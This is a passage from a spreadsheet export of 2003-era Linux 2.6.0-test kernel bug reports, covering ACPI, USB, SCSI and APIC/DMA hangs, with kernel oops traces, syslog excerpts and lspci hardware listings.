e5 8b &gt; Using defaults from ksymoops -t elf32-i386 -a i386 &gt; &gt; &gt; &gt;&gt;edi; f7ebddd0 &lt;_end+37a9304c/3a4f02dc&gt; &gt; &gt;&gt;ebp; f7ebdd78 &lt;_end+37a92ff4/3a4f02dc&gt; &gt; &gt;&gt;esp; f7ebdd74 &lt;_end+37a92ff0/3a4f02dc&gt; &gt; &gt; Trace; c01ede68 &lt;acpi_get_data+34/60&gt; &gt; Trace; c01fc0f2 &lt;acpi_bus_get_device+45/a9&gt; &gt; Trace; c01fc072 &lt;acpi_bus_data_handler+0/3b&gt; &gt; Trace; c02037c2 &lt;acpi_power_get_context+46/a6&gt; &gt; Trace; c01f8a2a &lt;acpi_ut_trace+29/2b&gt; &gt; Trace; c0203b8d &lt;acpi_power_off_device+46/19d&gt; &gt; Trace; c0203ee7 &lt;acpi_power_transition+111/138&gt; &gt; Trace; c01fc4c7 &lt;acpi_bus_set_power+15f/273&gt; &gt; Trace; c01f8a00 &lt;acpi_ut_debug_print_raw+29/2a&gt; &gt; Trace; c0207aed &lt;acpi_thermal_active+bf/187&gt; &gt; Trace; c0207e5e &lt;acpi_thermal_check+295/2e2&gt; &gt; Trace; c0208b60 &lt;acpi_thermal_notify+a6/105&gt; &gt; Trace; c01dce5a &lt;acpi_ev_notify_dispatch+54/7a&gt; &gt; Trace; c01d4f7d &lt;acpi_os_execute_deferred+3a/6c&gt; &gt; Trace; c011ff0a &lt;__run_task_queue+5a/70&gt; &gt; Trace; c01282e5 &lt;context_thread+135/1d0&gt; &gt; Trace; c01281b0 &lt;context_thread+0/1d0&gt; &gt; Trace; c0105000 &lt;_stext+0/0&gt; &gt; Trace; c01057ee &lt;arch_kernel_thread+2e/40&gt; &gt; Trace; c01281b0 &lt;context_thread+0/1d0&gt; Steps to reproduce:</t>
  </si>
  <si>
    <t>PCI Link programming hangs system if USB - TMTA/ALi - PIC</t>
  </si>
  <si>
    <t>2003-09-04 17:17 UTC</t>
  </si>
  <si>
    <t>2004-03-04 11:49 UTC</t>
  </si>
  <si>
    <t>In kernel 2.6.0-test3-bk3 ACPI PCI interrupt routing logic changed which causes any USB accesses on my machine to lock up the kernel. This is on a Fujitsu P2120 laptop. What logs would be helpful with this problem?</t>
  </si>
  <si>
    <t>LTP regression - 2.6.0-test4-mm6 breaks ptmx</t>
  </si>
  <si>
    <t>2.6.0-test4-mm6</t>
  </si>
  <si>
    <t>2003-09-05 11:30 UTC</t>
  </si>
  <si>
    <t>2003-10-21 13:56 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: 4xP3-700, 4GB Software Environment: 3.3.2 Problem Description: The following LTP tests regress between 2.6.0-test4-mm5 and -mm6: hangup01 ptem01 pty01 quick sanity check: # cat /dev/ptmx cat: /dev/ptmx: No such device Unix98 ptys are turned on in the .config CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=256 The common factor between them all is that they fail opening /dev/ptmx Steps to reproduce:</t>
  </si>
  <si>
    <t>usb mouse hangs</t>
  </si>
  <si>
    <t>2003-09-05 23:35 UTC</t>
  </si>
  <si>
    <t>John Wong</t>
  </si>
  <si>
    <t>2004-02-07 05:20 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: AMD Athlon XP on nForce2 Software Environment: Problem Description: When I am in X, after a few minutes, the USB mouse locks up. I'm able to use the keyboard to close whatever applications and zap X. I had this problem back with 2.4.21-pre/rc's where I was able to get the USB mouse working again by removing ohci-usb and reloading it. With 2.6.0-test4, when I try to remove ohci-usb, I get this: Sep 4 22:24:17 gambit kernel: ohci-hcd 0000:00:02.0: remove, state 3 Sep 4 22:24:17 gambit kernel: usb usb2: USB disconnect, address 1 Sep 4 22:24:17 gambit kernel: usb 2-1: USB disconnect, address 2 Sep 4 22:24:17 gambit kernel: PM: Removing info for usb:2-1:0 Sep 4 22:24:17 gambit kernel: PM: Removing info for usb:2-1 Sep 4 22:24:17 gambit kernel: usb 2-2: USB disconnect, address 3 Sep 4 22:24:18 gambit kernel: Badness in ohci_endpoint_disable at drivers/usb/host/ohci-hcd.c:342 Sep 4 22:24:18 gambit kernel: Call Trace: Sep 4 22:24:18 gambit kernel: [__crc_blk_rq_map_sg+5050497/5710020] ohci_endpoint_disable+0xdc/0x1b0 [ohci_hcd] Sep 4 22:24:18 gambit kernel: [__wake_up_common+49/96] __wake_up_common+0x31/0x60 Sep 4 22:24:18 gambit kernel: [hcd_endpoint_disable+231/416] hcd_endpoint_disable+0xe7/0x1a0 Sep 4 22:24:18 gambit kernel: [usb_disable_endpoint+116/128] usb_disable_endpoint+0x74/0x80 Sep 4 22:24:18 gambit kernel: [usb_disable_device+55/64] usb_disable_device+0x37/0x40 Sep 4 22:24:18 gambit kernel: [usb_disconnect+138/272] usb_disconnect+0x8a/0x110 Sep 4 22:24:18 gambit kernel: [usb_disconnect+251/272] usb_disconnect+0xfb/0x110 Sep 4 22:24:18 gambit kernel: [usb_hcd_pci_remove+127/384] usb_hcd_pci_remove+0x7f/0x180 Sep 4 22:24:18 gambit kernel: [pci_device_remove+59/64] pci_device_remove+0x3b/0x40 Sep 4 22:24:18 gambit kernel: [device_release_driver+100/112] device_release_driver+0x64/0x70 Sep 4 22:24:18 gambit kernel: [driver_detach+32/48] driver_detach+0x20/0x30 Sep 4 22:24:18 gambit kernel: [bus_remove_driver+61/128] bus_remove_driver+0x3d/0x80 Sep 4 22:24:18 gambit kernel: [driver_unregister+19/40] driver_unregister+0x13/0x28 Sep 4 22:24:18 gambit kernel: [pci_unregister_driver+22/48] pci_unregister_driver+0x16/0x30 Sep 4 22:24:18 gambit kernel: [__crc_blk_rq_map_sg+5053396/5710020] ohci_hcd_pci_cleanup+0xf/0x13 [ohci_hcd] Sep 4 22:24:18 gambit kernel: [sys_delete_module+307/336] sys_delete_module+0x133/0x150 Sep 4 22:24:18 gambit kernel: [sys_munmap+68/112] sys_munmap+0x44/0x70 Sep 4 22:24:18 gambit kernel: [syscall_call+7/11] syscall_call+0x7/0xb Steps to reproduce: startx Run a bunch of X apps (I had mozilla and one Eterm open) I had been browsing in mozilla for a few minutes when my gave in Ctrl-W's, Ctrl-Q, then zap X to get back to console I tried to stop gpm and then restart gpm to see if I got the mouse working again With gpm stopped, I tried to remove ohci-usb and the got the kernel error</t>
  </si>
  <si>
    <t>Alexander Clouter</t>
  </si>
  <si>
    <t>Architecture specific flags get passed twice to compiler</t>
  </si>
  <si>
    <t>2.6.0test4</t>
  </si>
  <si>
    <t>2003-09-06 08:23 UTC</t>
  </si>
  <si>
    <t>2004-08-20 12:00 UTC</t>
  </si>
  <si>
    <t>Sam Ravnborg</t>
  </si>
  <si>
    <t>When compiling a 2.6.0test4 kernel all flags that are added in the architecture specific Makefile (arch/*/Makefile) with CFLAGS += ... get added twice to the compiler command line. This can be seen when setting KBUILD_VERBOSE=1</t>
  </si>
  <si>
    <t>Cannot print to my USB Printer: Epson Stylus Color 680 (usblp)</t>
  </si>
  <si>
    <t>2.6.0-test5</t>
  </si>
  <si>
    <t>2003-09-07 06:53 UTC</t>
  </si>
  <si>
    <t>Daniel Drake</t>
  </si>
  <si>
    <t>2004-01-14 07:48 UTC</t>
  </si>
  <si>
    <t>Randy Dunlap</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: AMD XP2600+, 512mb RAM, 80GB Hard Disk, Abit NF7-S (nForce2) motherboard Software Environment: CUPS, Gimp-Print, Foomatic, Ghostscript Problem Description: Upon printing anything, the following messages appear in dmesg: ohci-hcd 0000:00:02.1: urb dfcefd00 path 3 ep2in 93d20000 cc 9 --&gt; status -121 usb 3-3: hcd_unlink_urb dfcefd80 fail -22 usb 3-3: hcd_unlink_urb dfcefd00 fail -22 The printer does not print the job, even though CUPS says the job is complete. The printer does not appear to respond at all to the print job. Steps to reproduce: Configure cups for the printer, and print anything from anywhere. I'd love to be able to test this on Linus's plain kernel. However, -test4-mm6 is the first kernel in the 2.6 series where it has recognised my printer as a USBLP device (previously, I was only getting debounce messages).</t>
  </si>
  <si>
    <t>2003-09-09 08:34 UTC</t>
  </si>
  <si>
    <t>Marcelo Penna Guerra</t>
  </si>
  <si>
    <t>2004-12-30 19:06 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: nForce2 chipset + SiI3112A onboard SATA controller Problem Description: When using APIC, file transfers hangs the system if DMA modes are enabled. When disabling DMA with hdparm, the system is stable. With APIC not compiled in (ACPI still enabled), the system is rock solid even with DMA on. This problem happens with both the onboard PATA (nForce2) and onboard SATA (SiI3112A). Other people on the nforcershq.com forums confirm this. Steps to reproduce: Enable ACPI, APIC, DMA transfer and just use the system for a few minutes. Running hdparm -t or bonnie a few times or just `cat /dev/hde &gt; / dev/null` hangs the system in a few seconds. If more information is needed, just ask.</t>
  </si>
  <si>
    <t>Null pointer deref in acpi_pci_link_calc_penalties on boot</t>
  </si>
  <si>
    <t>2.6.0-test5-mm1</t>
  </si>
  <si>
    <t>2003-09-09 08:58 UTC</t>
  </si>
  <si>
    <t>2003-10-21 13:57 UTC</t>
  </si>
  <si>
    <t>Distribution:RH8 Hardware Environment: summit, 4x(8ht) P4 Xeon-2.6GHz lspci -v 00:00.0 Host bridge: IBM: Unknown device 0302 (rev 03) Flags: bus master, 66Mhz, slow devsel, latency 240 Capabilities: [60] PCI-X non-bridge device. 00:03.0 VGA compatible controller: S3 Inc. Savage 4 (rev 06) (prog-if 00 [VGA]) Subsystem: IBM: Unknown device 01c5 Flags: bus master, medium devsel, latency 248, IRQ 39 Memory at f1200000 (32-bit, non-prefetchable) [size=512K] Memory at e0000000 (32-bit, prefetchable) [size=128M] Expansion ROM at &lt;unassigned&gt; [disabled] [size=64K] Capabilities: [dc] Power Management version 2 00:04.0 Bridge: IBM: Unknown device 010f Subsystem: IBM: Unknown device 0113 Flags: bus master, medium devsel, latency 247, IRQ 16 BIST result: 00 Memory at f1000000 (64-bit, non-prefetchable) [size=2M] I/O ports at 1800 [size=128] Expansion ROM at &lt;unassigned&gt; [disabled] [size=2M] Capabilities: [48] Power Management version 2 00:05.0 ISA bridge: VIA Technologies, Inc. VT82C686 [Apollo Super South] (rev 40) Flags: bus master, medium devsel, latency 0 Capabilities: [c0] Power Management version 2 00:05.1 IDE interface: VIA Technologies, Inc. VT82C586B PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Flags: bus master, medium devsel, latency 240 I/O ports at 0700 [size=16] Capabilities: [c0] Power Management version 2 00:05.2 USB Controller: VIA Technologies, Inc. USB (rev 16) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. (Wrong ID) USB Controller Flags: bus master, medium devsel, latency 240, IRQ 47 I/O ports at 1880 [size=32] Capabilities: [80] Power Management version 2 00:05.3 USB Controller: VIA Technologies, Inc. USB (rev 16) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. (Wrong ID) USB Controller Flags: bus master, medium devsel, latency 240, IRQ 47 I/O ports at 18a0 [size=32] Capabilities: [80] Power Management version 2 00:05.4 SMBus: VIA Technologies, Inc. VT82C686 [Apollo Super ACPI] (rev 40) Flags: medium devsel Capabilities: [68] Power Management version 2 01:00.0 Host bridge: IBM: Unknown device 0302 (rev 03) Flags: bus master, 66Mhz, slow devsel, latency 240 Capabilities: [60] PCI-X non-bridge device. 01:03.0 SCSI storage controller: Adaptec AIC-7899P U160/m (rev 01) Subsystem: IBM: Unknown device 09af Flags: bus master, 66Mhz, medium devsel, latency 240, IRQ 40 BIST result: 00 I/O ports at 2000 [size=256] Memory at f1e10000 (64-bit, non-prefetchable) [size=4K] Expansion ROM at &lt;unassigned&gt; [disabled] [size=128K] Capabilities: [dc] Power Management version 2 01:03.1 SCSI storage controller: Adaptec AIC-7899P U160/m (rev 01) Subsystem: IBM: Unknown device 09af Flags: bus master, 66Mhz, medium devsel, latency 240, IRQ 41 BIST result: 00 I/O ports at 2100 [size=256] Memory at f1e11000 (64-bit, non-prefetchable) [size=4K] Expansion ROM at &lt;unassigned&gt; [disabled] [size=128K] Capabilities: [dc] Power Management version 2 01:04.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5700 Gigabit Ethernet (rev 12) Subsystem: IBM Broadcom Vigil B5700 1000BaseTX Flags: bus master, 66Mhz, medium devsel, latency 240, IRQ 42 Memory at f1e00000 (64-bit, non-prefetchable) [size=64K] Capabilities: [40] PCI-X non-bridge device. Capabilities: [48] Power Management version 2 Capabilities: [50] Vital Product Data Capabilities: [58] Message Signalled Interrupts: 64bit+ Queue=0/3 Enable- 02:00.0 Host bridge: IBM: Unknown device 0302 (rev 03) Flags: bus master, 66Mhz, slow devsel, latency 240 Capabilities: [60] PCI-X non-bridge device. 05:00.0 Host bridge: IBM: Unknown device 0302 (rev 03) Flags: bus master, 66Mhz, slow devsel, latency 240 Capabilities: [60] PCI-X non-bridge device. 07:00.0 Host bridge: IBM: Unknown device 0302 (rev 03) Flags: bus master, 66Mhz, slow devsel, latency 240 Capabilities: [60] PCI-X non-bridge device. 09:00.0 Host bridge: IBM: Unknown device 0302 (rev 03) Flags: bus master, 66Mhz, slow devsel, latency 240 Capabilities: [60] PCI-X non-bridge device. 09:01.0 RAID bus controller: IBM Netfinity ServeRAID controller Subsystem: IBM: Unknown device 0208 Flags: bus master, 66Mhz, slow devsel, latency 240, IRQ 59 Memory at e8c00000 (32-bit, prefetchable) [size=8K] Expansion ROM at &lt;unassigned&gt; [disabled] [size=32K] Capabilities: [80] Power Management version 2 Software Environment: 2.6.0-test5-mm1 Problem Description: On boot, I get the following error: Starting migration thread for cpu 7 CPUS done 32 zapping low mappings. NET: Registered protocol family 16 PCI: PCI BIOS revision 2.10 entry at 0xfd30d, last bus=11 PCI: Using configuration type 1 mtrr: v2.0 (20020519) ACPI: Subsystem revision 20030813 ACPI: Interpreter disabled. Linux Plug and Play Support v0.97 (c) Adam Belay SCSI subsystem initialized Linux Kernel Card Services 3.1.22 options: [pci] [pm] Unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: 02246eb0 *pde = 00003001 *pte = 00000000 Oops: 0000 [#1] SMP CPU: 0 EIP: 0060:[&lt;02246eb0&gt;] Not tainted VLI EFLAGS: 00010293 EIP is at acpi_pci_link_calc_penalties+0x20/0xa0 eax: 00000000 ebx: 00000000 ecx: 00000000 edx: 00000000 esi: 0242abe0 edi: 0242afe0 ebp: 00000000 esp: e1f61fac ds: 007b es: 007b ss: 0068 Process swapper (pid: 1, threadinfo=e1f60000 task=086df940) Stack: 00000000 00000000 024ac02c 024be094 024b1ade 024be090 02498864 00000000 00000000 02131de9 e1f60000 00000000 021070ae 00000020 02107062 00000000 00000000 021092a1 00000000 00000000 00000000 Call Trace: [&lt;024ac02c&gt;] acpi_pci_irq_init+0x8/0x5a [&lt;024b1ade&gt;] pci_acpi_init+0x22/0x60 [&lt;02498864&gt;] do_initcalls+0x28/0x94 [&lt;02131de9&gt;] init_workqueues+0xf/0x26 [&lt;021070ae&gt;] init+0x4c/0x1a6 [&lt;02107062&gt;] init+0x0/0x1a6 [&lt;021092a1&gt;] kernel_thread_helper+0x5/0xc Code: 00 00 89 44 24 14 e9 f9 fe ff ff 57 b9 00 01 00 00 bf e0 ab 42 02 56 be e0 a7 42 02 f3 a5 8b 0d 34 31 4f 02 80 3d 01 32 49 02 02 &lt;8b&gt; 01 74 04 0f 18 00 90 81 f9 34 31 4f 02 74 30 0f b6 41 10 c6 &lt;0&gt;Kernel panic: Attempted to kill init! Steps to reproduce:</t>
  </si>
  <si>
    <t>NMI during poweroff - 2.4 only - S7505VB2</t>
  </si>
  <si>
    <t>2.4.22, 2.4.27</t>
  </si>
  <si>
    <t>2003-09-09 22:48 UTC</t>
  </si>
  <si>
    <t>2004-11-17 01:09 UTC</t>
  </si>
  <si>
    <t>Distribution: RHL9.0 Hardware Environment: S7505VB2, 2GB RAM, SATA, 5 NICs Software Environment: 2.4.22 kernel with ACPI enabled Problem Description: # init 0 provokes an NMI The system sometimes powers off, and sometimes resets. ... Turning off swap: Turning off quotas: Unmounting file systems: Halting system... flushing ide devices: hdc hde Power down. Uhhuh. NMI received. Dazed and Reproducible: yes</t>
  </si>
  <si>
    <t>sym53c8xx_2 oopses</t>
  </si>
  <si>
    <t>2003-09-10 04:10 UTC</t>
  </si>
  <si>
    <t>Rolf Eike Beer</t>
  </si>
  <si>
    <t>2005-07-05 12:05 UTC</t>
  </si>
  <si>
    <t>Problem Description: Just syslog output: 20:33:37 caliban kernel: SCSI subsystem initialized 20:33:37 caliban kernel: sym0: &lt;875&gt; rev 0x26 at pci 0000:00:09.0 irq 10 20:33:37 caliban kernel: sym0: Tekram NVRAM, ID 7, Fast-20, SE, parity checking 20:33:37 caliban kernel: sym0: SCSI BUS has been reset. 20:33:37 caliban kernel: scsi0 : sym-2.1.17a 20:33:42 caliban kernel: Vendor: IBM Model: DDYS-T18350N Rev: SA2A 20:33:42 caliban kernel: Type: Direct-Access ANSI SCSI revision: 03 20:33:42 caliban kernel: sym0:6:0: tagged command queuing enabled, command queue depth 16. 20:33:44 caliban kernel: sym0:6: FAST-20 WIDE SCSI 40.0 MB/s ST (50.0 ns, offset 16) 20:33:44 caliban kernel: SCSI device sda: 35843670 512-byte hdwr sectors (18352 MB) 20:33:44 caliban kernel: SCSI device sda: drive cache: write back 20:33:45 caliban kernel: /dev/scsi/host0/bus0/target6/lun0: p1 p2 p3 20:33:45 caliban kernel: Attached scsi disk sda at scsi0, channel 0, id 6, lun 0 20:34:03 caliban kernel: sym0: detaching ... 20:34:03 caliban kernel: sym0: resetting chip 20:34:17 caliban kernel: sym0: &lt;875&gt; rev 0x26 at pci 0000:00:09.0 irq 10 20:34:17 caliban kernel: sym0: Tekram NVRAM, ID 7, Fast-20, SE, parity checking 20:34:17 caliban kernel: sym0: SCSI BUS has been reset. 20:34:17 caliban kernel: scsi1 : sym-2.1.17a 20:34:22 caliban kernel: Vendor: IBM Model: DDYS-T18350N Rev: SA2A 20:34:22 caliban kernel: Type: Direct-Access ANSI SCSI revision: 03 20:34:22 caliban kernel: sym0:6:0: tagged command queuing enabled, command queue depth 16. 20:34:22 caliban kernel: sym0:6: FAST-20 WIDE SCSI 40.0 MB/s ST (50.0 ns, offset 16) 20:34:22 caliban kernel: SCSI device sdb: 35843670 512-byte hdwr sectors (18352 MB) 20:34:23 caliban kernel: SCSI device sdb: drive cache: write back 20:34:23 caliban kernel: /dev/scsi/host1/bus0/target6/lun0: p1 p2 p3 20:34:23 caliban kernel: Attached scsi disk sdb at scsi1, channel 0, id 6, lun 0 20:35:25 caliban kernel: Unable to handle kernel paging request at virtual address 5a5a5a5a 20:35:25 caliban kernel: printing eip: 20:35:25 caliban kernel: c8960817 20:35:25 caliban kernel: *pde = 00000000 20:35:25 caliban kernel: Oops: 0002 [#1] 20:35:25 caliban kernel: CPU: 0 20:35:25 caliban kernel: EIP: 0060:[__crc_add_disk+2169243/6434250] Not tainted 20:35:25 caliban kernel: EIP: 0060:[&lt;c8960817&gt;] Not tainted 20:35:25 caliban kernel: EFLAGS: 00210006 20:35:25 caliban kernel: EIP is at sym53c8xx_queue_command+0x97/0x100 [sym53c8xx] 20:35:25 caliban kernel: eax: 5a5a5a5a ebx: c4ffd120 ecx: 0000005a edx: c2e4360c 20:35:25 caliban kernel: esi: c2e43000 edi: c4ffd134 ebp: c561dd38 esp: c561dd2c 20:35:25 caliban kernel: ds: 007b es: 007b ss: 0068 20:35:25 caliban kernel: Process mount (pid: 1296, threadinfo=c561c000 task=c1678000) 20:35:25 caliban kernel: Stack: 00200287 c2e3d004 c4ffd004 c561dd5c c89c1a5e c4ffd004 c89c1cc0 00000000 20:35:25 caliban kernel: 00000001 c4ffd004 c2e3d004 c2d90004 c561dd84 c89c8027 c4ffd004 c4ffd004 20:35:25 caliban kernel: c561dd84 c2d901a4 c2f06004 c2d90004 c561dda0 c033eaa0 c561dd94 c0203268 20:35:25 caliban kernel: Call Trace: 20:35:25 caliban kernel: [__crc_add_disk+2567138/6434250] scsi_dispatch_cmd+0x25e/0x380 [scsi_mod] 20:35:25 caliban kernel: [&lt;c89c1a5e&gt;] scsi_dispatch_cmd+0x25e/0x380 [scsi_mod] 20:35:25 caliban kernel: [__crc_add_disk+2567748/6434250] scsi_done+0x0/0x80 [scsi_mod] 20:35:25 caliban kernel: [&lt;c89c1cc0&gt;] scsi_done+0x0/0x80 [scsi_mod] 20:35:25 caliban kernel: [__crc_add_disk+2593195/6434250] scsi_request_fn+0x287/0x5c0 [scsi_mod] 20:35:25 caliban kernel: [&lt;c89c8027&gt;] scsi_request_fn+0x287/0x5c0 [scsi_mod] 20:35:25 caliban kernel: [generic_unplug_device+296/384] generic_unplug_device+0x128/0x180 20:35:25 caliban kernel: [&lt;c0203268&gt;] generic_unplug_device+0x128/0x180 20:35:25 caliban kernel: [blk_run_queues+268/672] blk_run_queues+0x10c/0x2a0 20:35:25 caliban kernel: [&lt;c020358c&gt;] blk_run_queues+0x10c/0x2a0 20:35:25 caliban kernel: [__wait_on_buffer+198/224] __wait_on_buffer+0xc6/0xe0 20:35:25 caliban kernel: [&lt;c01627e6&gt;] __wait_on_buffer+0xc6/0xe0 20:35:25 caliban kernel: [autoremove_wake_function+0/64] autoremove_wake_function+0x0/0x40 20:35:25 caliban kernel: [&lt;c011a2c0&gt;] autoremove_wake_function+0x0/0x40 20:35:25 caliban kernel: [bio_alloc+194/416] bio_alloc+0xc2/0x1a0 20:35:25 caliban kernel: [&lt;c0167222&gt;] bio_alloc+0xc2/0x1a0 20:35:25 caliban kernel: [autoremove_wake_function+0/64] autoremove_wake_function+0x0/0x40 20:35:25 caliban kernel: [&lt;c011a2c0&gt;] autoremove_wake_function+0x0/0x40 20:35:25 caliban kernel: [submit_bio+54/128] submit_bio+0x36/0x80 20:35:25 caliban kernel: [&lt;c0205176&gt;] submit_bio+0x36/0x80 20:35:26 caliban kernel: [__bread_slow+106/192] __bread_slow+0x6a/0xc0 20:35:26 caliban kernel: [&lt;c0164aaa&gt;] __bread_slow+0x6a/0xc0 20:35:26 caliban kernel: [__bread+39/64] __bread+0x27/0x40 20:35:26 caliban kernel: [&lt;c0164d47&gt;] __bread+0x27/0x40 20:35:26 caliban kernel: [ext3_fill_super+198/2560] ext3_fill_super+0xc6/0xa00 20:35:26 caliban kernel: [&lt;c01ad1c6&gt;] ext3_fill_super+0xc6/0xa00 20:35:26 caliban kernel: [disk_name+71/128] disk_name+0x47/0x80 20:35:26 caliban kernel: [&lt;c019e667&gt;] disk_name+0x47/0x80 20:35:26 caliban kernel: [get_sb_bdev+233/320] get_sb_bdev+0xe9/0x140 20:35:26 caliban kernel: [&lt;c016a489&gt;] get_sb_bdev+0xe9/0x140 20:35:26 caliban kernel: [__kmalloc+64/480] __kmalloc+0x40/0x1e0 20:35:26 caliban kernel: [&lt;c0146600&gt;] __kmalloc+0x40/0x1e0 20:35:26 caliban kernel: [alloc_vfsmnt+129/192] alloc_vfsmnt+0x81/0xc0 20:35:26 caliban kernel: [&lt;c0183fc1&gt;] alloc_vfsmnt+0x81/0xc0 20:35:26 caliban kernel: [ext3_get_sb+25/27] ext3_get_sb+0x19/0x1b 20:35:26 caliban kernel: [&lt;c01ae5d9&gt;] ext3_get_sb+0x19/0x1b 20:35:26 caliban kernel: [ext3_fill_super+0/2560] ext3_fill_super+0x0/0xa00 20:35:26 caliban kernel: [&lt;c01ad100&gt;] ext3_fill_super+0x0/0xa00 20:35:26 caliban kernel: [do_kern_mount+59/160] do_kern_mount+0x3b/0xa0 20:35:26 caliban kernel: [&lt;c016a69b&gt;] do_kern_mount+0x3b/0xa0 20:35:26 caliban kernel: [do_add_mount+113/384] do_add_mount+0x71/0x180 20:35:26 caliban kernel: [&lt;c0185c31&gt;] do_add_mount+0x71/0x180 20:35:26 caliban kernel: [do_mount+268/352] do_mount+0x10c/0x160 20:35:26 caliban kernel: [&lt;c0185f6c&gt;] do_mount+0x10c/0x160 20:35:26 caliban kernel: [copy_mount_options+249/288] copy_mount_options+0xf9/0x120 20:35:26 caliban kernel: [&lt;c0185e39&gt;] copy_mount_options+0xf9/0x120 20:35:26 caliban kernel: [sys_mount+128/192] sys_mount+0x80/0xc0 20:35:26 caliban kernel: [&lt;c0186420&gt;] sys_mount+0x80/0xc0 20:35:26 caliban kernel: [syscall_call+7/11] syscall_call+0x7/0xb 20:35:26 caliban kernel: [&lt;c0109c77&gt;] syscall_call+0x7/0xb 20:35:26 caliban kernel: 20:35:26 caliban kernel: Code: 89 18 8d 65 f4 b8 00 00 00 00 5b 5e 5f c9 c3 8b 96 18 06 00 20:35:34 caliban kernel: &lt;1&gt;Unable to handle kernel paging request at virtual address c561dde4 20:35:34 caliban kernel: printing eip: 20:35:34 caliban kernel: c0117b35 20:35:34 caliban kernel: *pde = 00014067 20:35:34 caliban kernel: *pte = 0561d000 20:35:34 caliban kernel: Oops: 0000 [#2] 20:35:34 caliban kernel: CPU: 0 20:35:34 caliban kernel: EIP: 0060:[__wake_up_common+21/96] Not tainted 20:35:34 caliban kernel: EIP: 0060:[&lt;c0117b35&gt;] Not tainted 20:35:34 caliban kernel: EFLAGS: 00210012 20:35:34 caliban kernel: EIP is at __wake_up_common+0x15/0x60 20:35:34 caliban kernel: eax: c033eab8 ebx: c033eaa0 ecx: 00000000 edx: c561dde4 20:35:34 caliban kernel: esi: 00000000 edi: 00000000 ebp: c5595cc8 esp: c5595cb8 20:35:34 caliban kernel: ds: 007b es: 007b ss: 0068 20:35:34 caliban kernel: Process su (pid: 1302, threadinfo=c5594000 task=c1678000) 20:35:34 caliban kernel: Stack: 00000003 c033eaa0 00000000 00000003 c5595cf0 c0117be3 c033eaa0 00000003 20:35:34 caliban kernel: 00000000 00000000 00200212 c7917430 c798e004 c7917430 c5595d00 c01626ee 20:35:34 caliban kernel: c7917430 ffffffe2 c5595d4c c01b2ed1 00000400 c7917430 c7957004 00000000 20:35:34 caliban kernel: Call Trace: 20:35:34 caliban kernel: [__wake_up+99/256] __wake_up+0x63/0x100 20:35:34 caliban kernel: [&lt;c0117be3&gt;] __wake_up+0x63/0x100 20:35:34 caliban kernel: [unlock_buffer+46/96] unlock_buffer+0x2e/0x60 20:35:34 caliban kernel: [&lt;c01626ee&gt;] unlock_buffer+0x2e/0x60 20:35:34 caliban kernel: [do_get_write_access+401/2304] do_get_write_access+0x191/0x900 20:35:34 caliban kernel: [&lt;c01b2ed1&gt;] do_get_write_access+0x191/0x900 20:35:34 caliban kernel: [ext3_get_inode_loc+75/544] ext3_get_inode_loc+0x4b/0x220 20:35:34 caliban kernel: [&lt;c01a750b&gt;] ext3_get_inode_loc+0x4b/0x220 20:35:34 caliban kernel: [journal_get_write_access+29/64] journal_get_write_access+0x1d/0x40 20:35:35 caliban kernel: [&lt;c01b365d&gt;] journal_get_write_access+0x1d/0x40 20:35:35 caliban kernel: [ext3_reserve_inode_write+89/160] ext3_reserve_inode_write+0x59/0xa0 20:35:35 caliban kernel: [&lt;c01a8079&gt;] ext3_reserve_inode_write+0x59/0xa0 20:35:35 caliban kernel: [ext3_mark_inode_dirty+26/64] ext3_mark_inode_dirty+0x1a/0x40 20:35:35 caliban kernel: [&lt;c01a80da&gt;] ext3_mark_inode_dirty+0x1a/0x40 20:35:35 caliban kernel: [ext3_dirty_inode+103/128] ext3_dirty_inode+0x67/0x80 20:35:35 caliban kernel: [&lt;c01a8167&gt;] ext3_dirty_inode+0x67/0x80 20:35:35 caliban kernel: [__mark_inode_dirty+458/480] __mark_inode_dirty+0x1ca/0x1e0 20:35:35 caliban kernel: [&lt;c01897ea&gt;] __mark_inode_dirty+0x1ca/0x1e0 20:35:35 caliban kernel: [update_atime+180/192] update_atime+0xb4/0xc0 20:35:35 caliban kernel: [&lt;c0182294&gt;] update_atime+0xb4/0xc0 20:35:35 caliban kernel: [__generic_file_aio_read+386/480] __generic_file_aio_read+0x182/0x1e0 20:35:35 caliban kernel: [&lt;c013d8a2&gt;] __generic_file_aio_read+0x182/0x1e0 20:35:35 caliban kernel: [file_read_actor+0/256] file_read_actor+0x0/0x100 20:35:35 caliban kernel: [&lt;c013d620&gt;] file_read_actor+0x0/0x100 20:35:35 caliban kernel: [find_get_page+95/288] find_get_page+0x5f/0x120 20:35:35 caliban kernel: [&lt;c013cb7f&gt;] find_get_page+0x5f/0x120 20:35:35 caliban kernel: [generic_file_aio_read+61/96] generic_file_aio_read+0x3d/0x60 20:35:35 caliban kernel: [&lt;c013d93d&gt;] generic_file_aio_read+0x3d/0x60 20:35:35 caliban kernel: [do_sync_read+122/192] do_sync_read+0x7a/0xc0 20:35:35 caliban kernel: [&lt;c0160bba&gt;] do_sync_read+0x7a/0xc0 20:35:35 caliban kernel: [__vma_link+41/160] __vma_link+0x29/0xa0 20:35:35 caliban kernel: [&lt;c0150ea9&gt;] __vma_link+0x29/0xa0 20:35:35 caliban kernel: [vma_link+161/352] vma_link+0xa1/0x160 20:35:35 caliban kernel: [&lt;c0150fc1&gt;] vma_link+0xa1/0x160 20:35:35 caliban kernel: [do_mmap_pgoff+909/1568] do_mmap_pgoff+0x38d/0x620 20:35:35 caliban kernel: [&lt;c015198d&gt;] do_mmap_pgoff+0x38d/0x620 20:35:35 caliban kernel: [old_mmap+251/352] old_mmap+0xfb/0x160 20:35:35 caliban kernel: [&lt;c01115db&gt;] old_mmap+0xfb/0x160 20:35:35 caliban kernel: [vfs_read+152/224] vfs_read+0x98/0xe0 20:35:35 caliban kernel: [&lt;c0160c98&gt;] vfs_read+0x98/0xe0 20:35:35 caliban kernel: [sys_read+44/96] sys_read+0x2c/0x60 20:35:35 caliban kernel: [&lt;c0160eac&gt;] sys_read+0x2c/0x60 20:35:35 caliban 